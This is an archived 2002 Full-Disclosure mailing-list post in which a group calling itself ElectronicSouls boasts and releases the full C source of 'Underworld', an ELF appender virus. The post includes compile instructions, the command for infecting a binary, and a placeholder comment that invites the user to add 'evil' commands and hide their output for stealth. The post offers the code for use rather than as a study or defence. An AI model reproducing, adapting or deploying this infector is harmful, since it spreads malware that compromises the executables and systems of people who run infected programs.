lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <200211300214.gAU2EDUp021111@mailserver2.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - Not One of Us Is Owned

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

As the title of this email suggests, no members of our crew are owned.

Please enjoy the code.

# cat 4553underworld.c
/*
 -----------------------------------------------------------
 [CONFIDENTIAL SOURCE MATERIAL OF THE ELECTRONIC-SOULS CREW]
 ------------------- DO NOT DISTRIBUTE ! -------------------
 -----------------------------------------------------------

 [Underworld] - append ELF infect0r
                                   (C) BrainStorm - 01-2002
 -----------------------------------------------------------
 Information :
 +++++++++++++
 This ELF Infector uses the appendage infection tekneeq!
 that means to two Executeables are appended together.

 It worx like that :

  _________________
 |                 | The Parasite Code is first, thats why
 | [PARASITE CODE] | it needs to know its own size.
 |_________________|
 |                 | the host code stays untouched and gets
 | [ORIGINAL CODE] | extracted and executed from the virus.
 |_________________|

 -----------------------------------------------------------

 to get it working :
 +++++++++++++++++++
 'gcc code.c -O2 -o code', then get the file size and change
 the define in the code, now recompile and we are done ;)

 -----------------------------------------------------------

 to infect a binary :
 ++++++++++++++++++++
 cat /bin/binary >> underworld
 you get the point ...

 -----------------------------------------------------------

 special thanks to :
 +++++++++++++++++++
 ghQst and SectorX for making me interested in ELF infection
 and for beeing there for me since back in the days =)  !

 shouts go out to all ElectronicSouls members - j00 r0ck =)

 -----------------------------------------------------------
  [ElectronicSouls] -  keep the spirit alive !
 -----------------------------------------------------------

*/

/*

 KUNG FOO !

*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>

#define  PARASIZE         14985                  /* dont forget to change me ! */
#define  TEMP             ".para.tmp"            /* tmp file                   */
#define  KILL(X)          exit(1)                /* what could this be ?       */


int main(int argc, char *argv[], char *envp[])
{
	int  input,
            output,
            lenght;

        char *dope;
        struct stat stat;


	printf("\n\n Welcome on the other side ;>  \n 0x45 0x53 ! ph34r our krad tekneeqz !@# \n");

        /*

            [insert evil cmds here!]
            be sure to hide the output of external programs
            to be more stealth .. heh

            example:
            system("echo "did you know? i 0wn j00!" > /etc/motd");

            you get the point ;)

        */

	input = open("/proc/self/exe", O_RDONLY);

	if (input < 0)
        KILL("open(input)");

	if (fstat(input, &stat) < 0)
        KILL("fstat");

	lenght = stat.st_size - PARASIZE;
	dope = malloc(lenght);

	if (dope == NULL)
        KILL("malloc");

	if (lseek(input, PARASIZE, SEEK_SET) != PARASIZE)
        KILL("lseek(input)");

	if (read(input, dope, lenght) != lenght)
        KILL("read(input)");

	close(input);
	output = open(TEMP, O_RDWR | O_CREAT | O_TRUNC, stat.st_mode);

	if (output < 0)
        KILL("open(output)");

	if (write(output, dope, lenght) != lenght)
        KILL("write(output)");

	free(dope);
	close(output);

	exit(execve(TEMP, argv, envp));
}

/* quick and dirty, small but effective !@#                                      */
/* im new into this so send flames to /dev/null wh0r3z ..show better code 1st ;) */

#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"So Tired, We Have Insomnia"

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3oHwkMHGVzQGh1c2guY29tAAoJEN5nGqhGcjlt9aYAoLF/hFJ55U7r
bAa57+3t/dUOt/iJAJ4kFQNfEdrP900U3IfMU1ZwssnAgw==
=BZRe
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ